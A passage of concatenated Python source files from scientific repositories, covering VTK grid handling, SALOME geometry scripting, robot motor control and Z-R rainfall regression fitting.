    def parsehostlist(self, hostlist):
        """Parse a TORQUE exec_host string ("host/cpu+host/cpu+...").

        Side effect: sets self.ncpus (one per host/cpu token) and
        self.nodes (number of distinct hosts).  Returns the distinct
        host names as a list (Py2 dict.keys() returned a list; under
        Py3 this now returns an explicit list instead of a view).
        """
        self.ncpus = 0
        hosts = {}
        for item in hostlist.split("+"):
            tokens = item.split("/")
            if len(tokens) == 2:
                hosts[tokens[0]] = 1
                self.ncpus += 1
        self.nodes = len(hosts)
        return list(hosts)
|
FedoraScientific/salome-geom
|
src/GEOM_SWIG/PAL_MESH_035_geometry.py
|
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2007-2014 CEA/DEN, EDF R&D, OPEN CASCADE
#
# Copyright (C) 2003-2007 OPEN CASCADE, EADS/CCR, LIP6, CEA/DEN,
# CEDRAT, EDF R&D, LEG, PRINCIPIA R&D, BUREAU VERITAS
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
#####################################################################
#Created :15/02/2005
#Auhtor :KOVALTCHUK Alexey
#GUI test scenario :PAL-MESH-035 (geometry part)
#####################################################################
#
import salome
salome.salome_init()
import GEOM
from salome.geom import geomBuilder

# geompy is the geometry-building interface bound to the current study.
geompy = geomBuilder.New(salome.myStudy)

# Box creation (2.2)
Box_1 = geompy.MakeBoxDXDYDZ(200, 400, 300)
geompy.addToStudy(Box_1, "Box_1")

# Cylinder creation (2.8)
Cylinder_1 = geompy.MakeCylinderRH(100, 300)
geompy.addToStudy(Cylinder_1, "Cylinder_1")

# Cone creation (2.13)
Cone_1 = geompy.MakeConeR1R2H(100, 50, 200)
geompy.addToStudy(Cone_1, "Cone_1")

# Explode box, cone and cylinder on faces and vertices (2.18).
# Sub-shapes are published under their parent with sequential names
# (Face_1, Face_2, ..., Vertex_1, ...) continuing across shapes.
ListOfFaces_Box_1 = geompy.SubShapeAll(Box_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Box_1 = len(ListOfFaces_Box_1)
for i in range (0, NbExplodedFaces_Box_1):
    name = "Face_" + str(i+1)
    geompy.addToStudyInFather(Box_1, ListOfFaces_Box_1[i], name)
ListOfVertices_Box_1 = geompy.SubShapeAll(Box_1, geompy.ShapeType["VERTEX"])
NbExplodedVertices_Box_1 = len(ListOfVertices_Box_1)
for i in range (0, NbExplodedVertices_Box_1):
    name = "Vertex_" + str(i+1)
    geompy.addToStudyInFather(Box_1, ListOfVertices_Box_1[i], name)
ListOfFaces_Cylinder_1 = geompy.SubShapeAll(Cylinder_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Cylinder_1 = len(ListOfFaces_Cylinder_1)
for i in range (0, NbExplodedFaces_Cylinder_1):
    name = "Face_" + str(NbExplodedFaces_Box_1+i+1)
    geompy.addToStudyInFather(Cylinder_1, ListOfFaces_Cylinder_1[i], name)
ListOfFaces_Cone_1 = geompy.SubShapeAll(Cone_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Cone_1 = len(ListOfFaces_Cone_1)
for i in range (0, NbExplodedFaces_Cone_1):
    name = "Face_" + str(NbExplodedFaces_Box_1+NbExplodedFaces_Cylinder_1+i+1)
    geompy.addToStudyInFather(Cone_1, ListOfFaces_Cone_1[i], name)

# Plane creation through three box vertices (2.32)
Plane_1 = geompy.MakePlaneThreePnt(ListOfVertices_Box_1[0], ListOfVertices_Box_1[1], ListOfVertices_Box_1[3], 600)
geompy.addToStudy(Plane_1, "Plane_1")

# Partition the cylinder/cone face compound by the plane (2.32)
compound = geompy.MakeCompound([ListOfFaces_Cylinder_1[0], ListOfFaces_Cone_1[0]])
Partition_1 = geompy.MakeHalfPartition(compound, Plane_1)
geompy.addToStudy(Partition_1, "Partition_1")

# Explode partition on faces and vertices (2.38)
ListOfFaces_Partition_1 = geompy.SubShapeAll(Partition_1, geompy.ShapeType["FACE"])
NbExplodedFaces_Partition_1 = len(ListOfFaces_Partition_1)
for i in range (0, NbExplodedFaces_Partition_1):
    name = "Face_" + str(NbExplodedFaces_Box_1+NbExplodedFaces_Cylinder_1+NbExplodedFaces_Cone_1+i+1)
    geompy.addToStudyInFather(Partition_1, ListOfFaces_Partition_1[i], name)

# Explode selected faces on vertices (2.43); vertex numbering continues
# from the vertices already published above.
ListOfVertices_Face_7 = geompy.SubShapeAll(ListOfFaces_Cylinder_1[0], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_7 = len(ListOfVertices_Face_7)
for i in range (0, NbExplodedVertices_Face_7):
    name = "Vertex_" + str(NbExplodedVertices_Box_1+i+1)
    geompy.addToStudyInFather(ListOfFaces_Cylinder_1[0], ListOfVertices_Face_7[i], name)
ListOfVertices_Face_10 = geompy.SubShapeAll(ListOfFaces_Cone_1[0], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_10 = len(ListOfVertices_Face_10)
for i in range (0, NbExplodedVertices_Face_10):
    name = "Vertex_" + str(NbExplodedVertices_Box_1+NbExplodedVertices_Face_7+i+1)
    geompy.addToStudyInFather(ListOfFaces_Cone_1[0], ListOfVertices_Face_10[i], name)
ListOfVertices_Face_15 = geompy.SubShapeAll(ListOfFaces_Partition_1[2], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_15 = len(ListOfVertices_Face_15)
for i in range (0, NbExplodedVertices_Face_15):
    name = "Vertex_" + str(NbExplodedVertices_Box_1+NbExplodedVertices_Face_7+NbExplodedVertices_Face_10+i+1)
    geompy.addToStudyInFather(ListOfFaces_Partition_1[2], ListOfVertices_Face_15[i], name)
ListOfVertices_Face_18 = geompy.SubShapeAll(ListOfFaces_Partition_1[NbExplodedFaces_Partition_1-1], geompy.ShapeType["VERTEX"])
NbExplodedVertices_Face_18 = len(ListOfVertices_Face_18)
for i in range (0, NbExplodedVertices_Face_18):
    name = "Vertex_" + str(NbExplodedVertices_Box_1+NbExplodedVertices_Face_7+NbExplodedVertices_Face_10+NbExplodedVertices_Face_15+i+1)
    geompy.addToStudyInFather(ListOfFaces_Partition_1[NbExplodedFaces_Partition_1-1], ListOfVertices_Face_18[i], name)

# Refresh the object browser so the published shapes are visible.
salome.sg.updateObjBrowser(1)
|
simotek/tanko-bot
|
src/robotmain.py
|
# RobotMain - Simon Lees simon@simotek.net
# Copyright (C) 2015 Simon Lees
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
from PyLibs.uiserver import UiServer, UiServerCallbacks
from PyLibs.arduinointerface import ArduinoInterface, ArduinoInterfaceCallbacks
import argparse
import time
# Module-level UI server handle; assigned in the __main__ block below.
uiServer = None

# Stub callback, only registered when the serial link is disabled: echoes
# the commanded motor speeds straight back to the UI.
def onDriveMotor(args):
    print("On DriveMotor")
    left_speed, right_speed = args[0], args[1]
    uiServer.announceLeftMotorSpeed(left_speed)
    uiServer.announceRightMotorSpeed(right_speed)
if __name__ == '__main__':
    parser = argparse.ArgumentParser("Main Robot control app")
    parser.add_argument('--no-serial', dest='noserial', action='store_true')
    args = parser.parse_args()

    serverCallbacks = UiServerCallbacks()
    arduinoCallbacks = ArduinoInterfaceCallbacks()
    uiServer = UiServer(serverCallbacks)

    # Bug fix: arduinoInterface was only bound in the serial branch, yet it
    # was used unconditionally below, so --no-serial mode crashed with a
    # NameError on the first loop iteration.
    arduinoInterface = None
    if args.noserial:
        # Serial stubbed out: echo drive commands straight back to the UI.
        serverCallbacks.sendDriveMotor.register(onDriveMotor)
    else:
        arduinoCallbacks.annLeftDriveMotor.register(uiServer.announceLeftMotorSpeed)
        arduinoCallbacks.annRightDriveMotor.register(uiServer.announceRightMotorSpeed)
        arduinoInterface = ArduinoInterface(arduinoCallbacks)
        servercallbacks = uiServer.getCallbacks()
        servercallbacks.sendDriveMotor.register(arduinoInterface.sendDriveMotorSpeed)
        uiServer.setCallbacks(servercallbacks)
        # Send Ready for status LED.  Bug fix: this was previously called on
        # the class (ArduinoInterface.sendReady()) and outside the serial
        # branch; presumably it is an instance method -- confirm against
        # PyLibs.arduinointerface.
        arduinoInterface.sendReady()

    # Main app event loop: pump both message queues, yielding the CPU briefly.
    while True:
        uiServer.processMessages()
        if arduinoInterface is not None:
            arduinoInterface.processMessages()
        time.sleep(0.01)
|
FluidityProject/multifluids
|
tools/tvtktools.py
|
from enthought.tvtk.api import tvtk
import math
import numpy
import scipy.linalg
# All returned arrays are cast into either numpy or numarray arrays
arr=numpy.array
class vtu:
    """Unstructured grid object to deal with VTK unstructured grids.

    Thin wrapper around a tvtk XMLUnstructuredGrid: reads a .vtu file and
    exposes point-data fields as numpy arrays, plus a few mesh queries.
    """

    def __init__(self, filename):
        """Creates a vtu object by reading the specified file."""
        gridreader = tvtk.XMLUnstructuredGridReader(file_name=filename)
        gridreader.update()
        self.ugrid = gridreader.output
        self.filename = filename

    def GetScalarField(self, name):
        """Returns an array with the values of the specified scalar field."""
        return arr(self.ugrid.point_data.get_array(name))

    def GetVectorField(self, name):
        """Returns an array with the values of the specified vector field."""
        # NOTE: identical to GetScalarField; kept separate for API clarity.
        return arr(self.ugrid.point_data.get_array(name))

    def GetVectorNorm(self, name):
        """Return the field with the norm of the specified vector field."""
        v = self.GetVectorField(name)
        n = []
        norm = scipy.linalg.norm  # hoist the attribute lookup out of the loop
        for node in range(self.ugrid.number_of_points):
            n.append(norm(v[node]))
        return arr(n)

    def GetField(self, name):
        """Returns an array with the values of the specified field.

        Rank-2 tensor fields (9 or 4 components) are reshaped to
        (ntuples, 3, 3) / (ntuples, 2, 2); anything else to (ntuples, nc).
        """
        pointdata = self.ugrid.point_data
        vtkdata = pointdata.get_array(name)
        nc = vtkdata.number_of_components
        nt = vtkdata.number_of_tuples
        array = arr(vtkdata)
        if nc == 9:
            return array.reshape(nt, 3, 3)
        elif nc == 4:
            return array.reshape(nt, 2, 2)
        else:
            return array.reshape(nt, nc)

    def Write(self, filename=[]):
        """Writes the grid to a vtu file.

        If no filename is specified it will use the name of the file
        originally read in, thus overwriting it!
        (The [] default is kept as a no-filename sentinel for interface
        compatibility; it is never mutated.)
        """
        if filename == []:
            filename = self.filename
        gridwriter = tvtk.XMLUnstructuredGridWriter(file_name=filename, input=self.ugrid)
        gridwriter.write()

    def AddScalarField(self, name, array):
        """Adds a scalar field with the specified name using the values from the array."""
        # In vtktools.py the following used SetNumberOfValues=len(array)
        data = tvtk.FloatArray(number_of_tuples=len(array), name=name)
        for i in range(len(array)):
            data.set_value(i, array[i])
        pointdata = self.ugrid.point_data
        pointdata.add_array(data)
        pointdata.set_active_scalars(name)

    def AddVectorField(self, name, array):
        """Adds a vector field with the specified name using the values from the array."""
        n = array.size
        # In vtktools.py the following used SetNumberOfValues=n
        data = tvtk.FloatArray(number_of_components=array.shape[1], number_of_tuples=n, name=name)
        for i in range(n):
            data.set_value(i, array.reshape(n)[i])
        pointdata = self.ugrid.point_data
        pointdata.add_array(data)
        pointdata.set_active_vectors(name)

    def AddField(self, name, array):
        """Adds a field with arbitrary number of components under the specified name."""
        n = array.size
        sh = arr(array.shape)
        # number of tuples is sh[0]; number of components is the product of
        # the rest of sh.
        # Bug fix: this used vtk.vtkFloatArray, but 'vtk' is never imported
        # in this module (only tvtk is) -- that line raised NameError.  Use
        # tvtk.FloatArray like the other Add* methods.
        data = tvtk.FloatArray(number_of_components=sh[1:].prod(), number_of_tuples=n, name=name)
        flatarray = array.reshape(n)
        for i in range(n):
            data.set_value(i, flatarray[i])
        pointdata = self.ugrid.point_data
        pointdata.add_array(data)

    def ApplyProjection(self, projection_x, projection_y, projection_z):
        """Applies a projection to the grid coordinates, overwriting them.

        WARNING: the projection strings are eval()'d with x, y, z in scope;
        only pass trusted expressions.
        """
        npoints = self.ugrid.number_of_points
        for i in range(npoints):
            (x, y, z) = self.ugrid.get_point(i)
            new_x = eval(projection_x)
            new_y = eval(projection_y)
            new_z = eval(projection_z)
            self.ugrid.points.set_point(i, new_x, new_y, new_z)

    def ProbeData(self, coordinates, name):
        """Interpolate field values at these coordinates.

        Points falling outside the mesh are snapped to the nearest mesh
        vertex before the final probe pass.
        """
        # Initialise locator
        bbox = self.ugrid.bounds
        locator = tvtk.PointLocator(data_set=self.ugrid, tolerance=10.0)
        locator.update()
        # Initialise probe
        points = tvtk.Points()
        ilen, jlen = coordinates.shape
        for i in range(ilen):
            points.insert_next_point(coordinates[i][0], coordinates[i][1], coordinates[i][2])
        polydata = tvtk.PolyData(points=points)
        probe = tvtk.ProbeFilter(input=polydata, source=self.ugrid)
        probe.update()
        # Reposition invalid nodes at nearest mesh vertices.
        # Bug fix: the result was assigned to 'alid_ids' (typo) while the
        # loop below reads 'valid_ids', which raised NameError.
        valid_ids = probe.valid_points
        valid_points = tvtk.Points()
        valid_loc = 0
        for i in range(ilen):
            if valid_ids.get_tuple1(valid_loc) == i:
                valid_points.insert_next_point(coordinates[i][0], coordinates[i][1], coordinates[i][2])
                valid_loc = valid_loc + 1
            else:
                nearest = locator.find_closest_point([coordinates[i][0], coordinates[i][1], coordinates[i][2]])
                point = self.ugrid.points.get_point(nearest)
                valid_points.insert_next_point(point[0], point[1], point[2])
        polydata.points = valid_points
        probe.input = polydata
        probe.update()
        # Get final updated values.
        pointdata = probe.output.point_data
        vtkdata = pointdata.get_array(name)
        # Consistency fix: number_of_components/number_of_tuples are accessed
        # as tvtk trait properties elsewhere (see GetField), but were called
        # here as VTK-style getter methods -- presumably a porting leftover.
        nc = vtkdata.number_of_components
        nt = vtkdata.number_of_tuples
        array = arr(vtkdata)
        array.shape = (nt, nc)
        return array

    def RemoveField(self, name):
        """Removes said field from the unstructured grid."""
        self.ugrid.point_data.remove_array(name)

    def GetLocations(self):
        """Returns an array with the locations of the nodes."""
        return arr(self.ugrid.points.data)

    def GetCellPoints(self, id):
        """Returns an array with the node numbers of each cell (ndglno)."""
        idlist = tvtk.IdList()
        self.ugrid.get_cell_points(id, idlist)
        return arr([idlist.get_id(i) for i in range(idlist.number_of_ids)])

    def GetFieldNames(self):
        """Returns the names of the available fields."""
        pointdata = self.ugrid.point_data
        return [pointdata.get_array_name(i) for i in range(pointdata.number_of_arrays)]

    def GetPointCells(self, id):
        """Return an array with the elements which contain a node."""
        idlist = tvtk.IdList()
        self.ugrid.get_point_cells(id, idlist)
        # Consistency fix: number_of_ids is used as a property in
        # GetCellPoints but was called as a method here.
        return arr([idlist.get_id(i) for i in range(idlist.number_of_ids)])

    def GetPointPoints(self, id):
        """Return the nodes connecting to a given node."""
        cells = self.GetPointCells(id)
        lst = []
        for cell in cells:
            lst = lst + list(self.GetCellPoints(cell))
        s = set(lst)  # remove duplicates
        return arr(list(s))  # make into a list again

    def GetDistance(self, x, y):
        """Return the distance in physical space between nodes x and y."""
        posx = self.ugrid.get_point(x)
        posy = self.ugrid.get_point(y)
        return math.sqrt(sum([(posx[i] - posy[i])**2 for i in range(len(posx))]))

    def Crop(self, min_x, max_x, min_y, max_y, min_z, max_z):
        """Trim off the edges defined by a bounding box."""
        trimmer = tvtk.ExtractUnstructuredGrid(input=self.ugrid, extent=(min_x, max_x, min_y, max_y, min_z, max_z))
        trimmer.update()
        self.ugrid = trimmer.output

    def StructuredPointProbe(self, nx, ny, nz, bounding_box=None):
        """Probe the unstructured grid dataset using a structured points dataset."""
        # Idiom fix: compare to None with 'is', not '=='.
        if bounding_box is None:
            bbox = self.ugrid.bounds
        else:
            bbox = bounding_box
        spacing = [0.0, 0.0, 0.0]
        if nx > 1: spacing[0] = (bbox[1] - bbox[0]) / (nx - 1.0)
        if ny > 1: spacing[1] = (bbox[3] - bbox[2]) / (ny - 1.0)
        if nz > 1: spacing[2] = (bbox[5] - bbox[4]) / (nz - 1.0)
        sgrid = tvtk.StructuredPoints(dimensions=(nx, ny, nz), origin=[bbox[0], bbox[2], bbox[4]], spacing=spacing)
        probe = tvtk.ProbeFilter(source=self.ugrid, input=sgrid)
        probe.update()
        return probe.output
|
FedoraScientific/salome-smesh
|
src/Tools/blocFissure/gmu/facesVolumesToriques.py
|
# -*- coding: utf-8 -*-
import logging
from geomsmesh import geompy
from extractionOrientee import extractionOrientee
from getSubshapeIds import getSubshapeIds
# -----------------------------------------------------------------------------
# --- TORE
# --- faces toriques et volumes du tore
def facesVolumesToriques(tore, plan, facesDefaut):
    """
    Extract the two faces and the two volumes of the partitioned torus
    that follow the elliptical generatrix.

    @param tore: the partitioned and cut torus
    @param facesDefaut: defect-zone faces, used to discard torus faces
        lying on the skin
    @param plan: the cutting plane
    @return (facetore1, facetore2, volumeTore1, volumeTore2): the two
        faces along the generatrix and the two solid volumes
        (the original docstring documented only the two faces).
    """
    logging.info("start")
    centre = geompy.MakeVertexOnSurface(plan, 0.5, 0.5)
    normal = geompy.GetNormal(plan, centre)
    reference = geompy.MakeTranslationVector(centre, normal)
    [facesInPlan, facesOutPlan, facesOnPlan] = extractionOrientee(plan, tore, reference, "FACE", 1.e-2, "faceTorePlan_")
    [facesInSide, facesOutSide, facesOnSide] = extractionOrientee(facesDefaut, tore, reference, "FACE", 1.e-2, "faceTorePeau_")
    facesIdInPlan = getSubshapeIds(tore, facesInPlan)
    facesIdOutPlan = getSubshapeIds(tore, facesOutPlan)
    facesIdOnSide = getSubshapeIds(tore, facesOnSide)
    # (Unused facesIdInSide/facesIdOutSide computations removed; they only
    # served a commented-out line.)
    facetore1 = None
    # Bug fix: this was 'faceTore2 = None' (capitalisation typo), so the
    # lowercase 'facetore2' used below stayed unbound and raised NameError
    # whenever the second loop found no matching face.
    facetore2 = None
    # Pick the first face on each side of the plane that is not on the skin.
    for i, faceId in enumerate(facesIdInPlan):
        if faceId not in facesIdOnSide:
            facetore1 = facesInPlan[i]
            break
    for i, faceId in enumerate(facesIdOutPlan):
        if faceId not in facesIdOnSide:
            facetore2 = facesOutPlan[i]
            break
    geompy.addToStudyInFather( tore, facetore1, 'facetore1' )
    geompy.addToStudyInFather( tore, facetore2, 'facetore2' )
    [volumeTore1, volumeTore2] = geompy.ExtractShapes(tore, geompy.ShapeType["SOLID"], True)
    geompy.addToStudyInFather( tore, volumeTore1, 'volumeTore1' )
    geompy.addToStudyInFather( tore, volumeTore2, 'volumeTore2' )
    return facetore1, facetore2, volumeTore1, volumeTore2
|
nguy/pyparticleprobe
|
pyparticleprobe/dsd_calcs/zr.py
|
"""
pyparticleprobe.dsd_calcs.zr
===============================
A grouping of functions for calculations of a Z-R relationship from a drop
size distribution.
Adapted by Nick Guy.
"""
# HISTORY::
# 28 Feb 2014 - Nick Guy. NRC, NOAA/NSSL (nick.guy@noaa.gov)
# Converted NCL functions below to Python
# FUNCTIONS::
# linreg - Least squares linear regression fit
# regfit_powerlaw - Create a fit line from the regression data
# SD_filter - Filter a variable given a standard deviation
# regfit_abcd - Calculate a,b,c,d power law coefficients from regression data
# save_stats - Save a number of statistics into a text file for documentation
# get_zr_linreg - Solve for a,b,c,d coefficient and exponents in ZR relationship
#-------------------------------------------------------------------
# Load the needed packages
import numpy as np
from scipy import stats
#-------------------------------------------------------------------
# Define various constants that may be used for calculations
#
#===============================================================
# BEGIN FUNCTIONS
#**===============================================================
def linreg(Z,R):
    """Least-squares linear regression of rainfall rate on reflectivity.

    Both inputs are transformed to log10 space before fitting, since a
    power law becomes linear in log-log space and the bulk of observed
    data is weighted toward low values.

    Parameters
    ----------
    Z : array_like
        Reflectivity [mm^6 m^-3]
    R : array_like
        Rainfall rate [mm h^-1]

    Returns
    -------
    slope, intercept, rVal, pVal, std_err
        Regression slope and intercept, correlation coefficient,
        two-sided p-value (null hypothesis: slope = 0), and standard
        error of the estimate.

    Notes
    -----
    The masked-array variant of linregress is used so masked points are
    ignored instead of contaminating the fit.
    """
    logZ = np.ma.log10(Z)
    logR = np.ma.log10(R)
    fit = stats.mstats.linregress(logZ, logR)
    return fit[0], fit[1], fit[2], fit[3], fit[4]
#**====================================================
def regfit_powerlaw(Z,slope,intercept,limLo=1E-2,limHi=1E6,Rtest=False):
    """Build power-law fit lines from log-log regression coefficients.

    Creates a linear array of independent reflectivity values spanning
    [limLo, limHi] and the corresponding rainfall-rate fit line via the
    power law R = 10^intercept * Z^slope.

    Parameters
    ----------
    Z : array_like
        Reflectivity [mm^6 m^-3]; only its length (and, for Rtest, its
        values) are used.
    slope : float
        Slope of the log10-log10 regression line.
    intercept : float
        Intercept of the log10-log10 regression line.
    limLo, limHi : float, optional
        Lower/upper limits of the fit line.
    Rtest : bool, optional
        When True, also return rainfall computed from the measured Z
        values; useful as input to SD_filter for outlier removal.

    Returns
    -------
    Zfit, Rfit : ndarray
        Independent fit line and dependent power-law values.
    Rcalc : ndarray, optional
        Rainfall computed from the input Z (only when Rtest is True).
    """
    prefactor = 10.**intercept
    Zfit = np.linspace(limLo, limHi, len(Z))
    Rfit = prefactor * Zfit**slope
    if not Rtest:
        return Zfit, Rfit
    Rcalc = prefactor * Z**slope
    return Zfit, Rfit, Rcalc
#**====================================================
def SD_filter(Var,R,Rfit,Xsd):
    """Mask outliers in Var relative to a rainfall fit line.

    A point is treated as an outlier when its rainfall rate R lies at or
    beyond Xsd standard deviations (of the full R series) from the fit
    value Rfit at that point.

    Parameters
    ----------
    Var : ndarray
        Variable to be filtered; same shape as R.
    R : ndarray
        Rainfall rate [mm h^-1].
    Rfit : ndarray
        Fit-line rainfall values compared against R.
    Xsd : float
        Multiplication factor applied to the standard deviation of R.

    Returns
    -------
    numpy.ma.MaskedArray
        Copy of Var with outlier points masked.
    """
    band = Xsd * R.std()
    is_outlier = (R <= (Rfit - band)) | (R >= (Rfit + band))
    return np.ma.masked_where(is_outlier, Var.copy(), copy=False)
#**====================================================
def regfit_abcd(slope,intercept):
    """Derive Z-R power-law coefficients from log-log regression results.

    Assumes the regression treated Z as the independent variable, i.e.
    log10(R) = intercept + slope * log10(Z), equivalently R = c Z^d.
    Inverting that relation yields Z = a R^b.

    Parameters
    ----------
    slope, intercept : float
        Slope and intercept of the log10-log10 regression line.

    Returns
    -------
    a, b, c, d : float
        Coefficient/exponent of Z = a R^b (a, b) and of R = c Z^d (c, d).
    """
    c = 10.**intercept
    d = slope
    b = 1. / d
    a = (1. / c)**b
    return a, b, c, d
#**====================================================
def get_zr_linreg(Z,R,filter=False,SDmult=1.,limLo=1E-2,limHi=1E6):
    """Solve for Z-R power-law coefficients via linear regression.

    Fits log10(R) against log10(Z), optionally removes outliers with a
    standard-deviation filter and refits, then converts slope/intercept
    into the power-law forms Z = aR^b and R = cZ^d.

    Parameters
    ----------
    Z : array_like
        Reflectivity [mm^6 m^-3]
    R : array_like
        Rainfall rate [mm h^-1]
    filter : bool, optional
        If True, refit after masking points more than SDmult standard
        deviations from the first-pass fit line.
    SDmult : float, optional
        Multiplier for the standard-deviation filter.
    limLo, limHi : float, optional
        Lower/upper limits of the fit line.

    Returns
    -------
    tuple or dict
        When filter is True: (a, b, c, d, nPts) for the filtered data.
        When filter is False: dict with keys 'Mode', 'a', 'b', 'c', 'd'
        and 'number_pts'.

    Notes
    -----
    The two branches return different container types; this asymmetry is
    preserved for backward compatibility with existing callers.
    """
    # First-pass least-squares fit of the log-log distribution.
    Regslp, RegInt, rVal, pVal, stdErr = linreg(Z, R)
    a_all, b_all, c_all, d_all = regfit_abcd(Regslp, RegInt)

    if filter:
        # Rtest=True also returns rainfall computed from the measured Z via
        # the first-pass power law; that defines the line the filter uses.
        Zfit, RegFit, RRtest = regfit_powerlaw(Z, Regslp, RegInt,
                                               limLo=limLo, limHi=limHi, Rtest=True)
        # Mask points lying outside SDmult standard deviations of the fit.
        Z_filt = SD_filter(Z, R, RRtest, SDmult)
        R_filt = SD_filter(R, R, RRtest, SDmult)
        # Refit using only the surviving (unmasked) points.
        RegslpFilt, RegIntFilt, rValFilt, pValFilt, stdErrFilt = linreg(Z_filt, R_filt)
        a_filt, b_filt, c_filt, d_filt = regfit_abcd(RegslpFilt, RegIntFilt)
        # Unmasked element count of the filtered series.
        nPts = R_filt.count()
        return a_filt, b_filt, c_filt, d_filt, nPts

    nPts = len(R)
    # BUG FIX: the 'd' entry previously repeated the value of c.
    return {'Mode': 'NonFiltered',
            'a': a_all,
            'b': b_all,
            'c': c_all,
            'd': d_all,
            'number_pts': nPts
            }
#**====================================================
def save_stats(fname,title=None,Conc=None,nPtsAll=None,cFactAll=None,dFactAll=None,aFactAll=None,
               bFactAll=None,nPtsFilt=None,cFactFilt=None,dFactFilt=None,aFactFilt=None,
               bFactFilt=None,rValAll=None,pValAll=None,stdErrAll=None,rValFilt=None,
               pValFilt=None,stdErrFilt=None,Nw=None,
               D0=None,Nw_D0_cst=None,W=None):
    """Save a text file with output stats calculated from Z-R relationship calculations.

    INPUT::
     fname = Name of output file
     title = Title information to identify statistics
    OPTIONAL::
     See the printout for details of inputs
    OUTPUT::
     fname = Text file
    USAGE::
     zr.save_stats(fname,[**args])
    NOTES::
     Although title, Conc, Nw, D0 and Nw_D0_cst default to None, they are
     dereferenced unconditionally below, so the call fails unless they are
     all supplied — TODO confirm intended contract with callers.
     Nw_D0_cst appears to encode Bringi et al. 2009 classes
     (1=stratiform, 2=convective, 3=transition) — verify against caller.
    """
    #---------------------------------------
    # np.savetxt requires array data to write; a single zero is written so
    # the statistics can be carried entirely in the header text.
    # Create a single element needed to save file
    empty = [0.]
    ZRstatsTex = "=======================================\n"
    ZRstatsTex += "**** "+fname+" ****\n"
    ZRstatsTex += "DROP SIZE DISTRIBUTION CONCENTRATION\n"
    ZRstatsTex += "min Conc = " + str(Conc.min())+"\n"
    ZRstatsTex += "max Conc = " + str(Conc.max())+"\n"
    ZRstatsTex += "=======================================\n"
    ZRstatsTex += " \n"
    ZRstatsTex += title+"\n"
    ZRstatsTex += "========================================\n"
    ZRstatsTex += "PREFACTOR AND EXPONENT ESTIMATION\n"
    # Unfiltered regression results.
    ZRstatsTex += "All Data: R=cZ^d:: c = "+str(cFactAll)+" , d = "+str(dFactAll)+"\n"
    ZRstatsTex += "          Z=aR^b:: a = "+str(aFactAll)+" , b = "+str(bFactAll)+"\n"
    ZRstatsTex += "          Correlation = "+str(rValAll)+"  p = "+str(pValAll)+"  StdErr = "+str(stdErrAll)+"\n"
    ZRstatsTex += "          # Points = "+str(nPtsAll)+"\n"
    ZRstatsTex += "     -----------------\n"
    # Results after standard-deviation filtering.
    ZRstatsTex += "Filtered Data: R=cZ^d:: c = "+str(cFactFilt)+" , d = "+str(dFactFilt)+"\n"
    ZRstatsTex += "               Z=aR^b:: a = "+str(aFactFilt)+" , b = "+str(bFactFilt)+"\n"
    ZRstatsTex += "          Correlation = "+str(rValFilt)+"  p = "+str(pValFilt)+"  StdErr = "+str(stdErrFilt)+"\n"
    ZRstatsTex += "          # Points = "+str(nPtsFilt)+"\n"
    ZRstatsTex += "=========================================\n"
    ZRstatsTex += " \n"
    ZRstatsTex += "==============================================\n"
    ZRstatsTex += " \n"
    # Per-class Nw/D0 statistics, selected by boolean indexing on Nw_D0_cst.
    ZRstatsTex += "Bringi et al. 2009, Conv-Strat-Trans\n"
    ZRstatsTex += "Stratiform: "+str(len(Nw_D0_cst[Nw_D0_cst == 1]))+" points"+"\n"
    ZRstatsTex += "Mean Nw = "+str(np.log10(Nw[Nw_D0_cst == 1].mean()))+", SD = "+str(np.log10(Nw[Nw_D0_cst == 1].std()))+"\n"
    ZRstatsTex += "Mean D0 = "+str(D0[Nw_D0_cst == 1].mean())+", SD = "+str(D0[Nw_D0_cst == 1].std())+"\n"
    ZRstatsTex += "================================\n"
    ZRstatsTex += "Convective: "+str(len(Nw_D0_cst[Nw_D0_cst == 2]))+" points"+"\n"
    ZRstatsTex += "Mean Nw = "+str(np.log10(Nw[Nw_D0_cst == 2].mean()))+", SD = "+str(np.log10(Nw[Nw_D0_cst == 2].std()))+"\n"
    ZRstatsTex += "Mean D0 = "+str(D0[Nw_D0_cst == 2].mean())+", SD = "+str(D0[Nw_D0_cst == 2].std())+"\n"
    ZRstatsTex += "=================================\n"
    ZRstatsTex += "Transition: "+str(len(Nw_D0_cst[Nw_D0_cst == 3]))+" points"+"\n"
    ZRstatsTex += "Mean Nw = "+str(np.log10(Nw[Nw_D0_cst == 3].mean()))+", SD = "+str(np.log10(Nw[Nw_D0_cst == 3].std()))+"\n"
    ZRstatsTex += "Mean D0 = "+str(D0[Nw_D0_cst == 3].mean())+", SD = "+str(D0[Nw_D0_cst == 3].std())+"\n"
    ZRstatsTex += "=================================\n"
#    ZRstatsTex += "Mean W = "+str(W[Nw_D0_cs == 2].mean())+", SD = "+str(W[Nw_D0_cs == 2].std())+"\n"
    ZRstatsTex += "==============================================\n"
    ZRstatsTex += " \n"
    # Save the file
    np.savetxt(fname, empty, header=ZRstatsTex)
#====================================================
|
visionegg/visionegg
|
VisionEgg/PyroApps/SphereGratingServer.py
|
#!/usr/bin/env python
"""Handle perspective-distorted sinusoidal gratings (server-side)"""
